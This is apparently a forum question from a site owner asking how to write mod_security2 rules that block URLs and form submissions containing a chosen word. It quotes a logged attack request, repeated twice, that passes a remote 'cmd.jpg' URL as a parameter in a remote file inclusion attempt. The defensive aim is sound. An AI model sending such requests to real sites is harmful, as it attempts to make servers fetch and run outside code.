I checked my mod_security2 log file and see a lot of entries similar to this:
GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg
How do I set up a mod_security2 rule so that the hacker is stopped when:
1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".
2) He submits a form from my site and the content contains a specific word.
GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg
How do I set up a mod_security2 rule so that the hacker is stopped when:
1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".
2) He submits a form from my site and the content contains a specific word.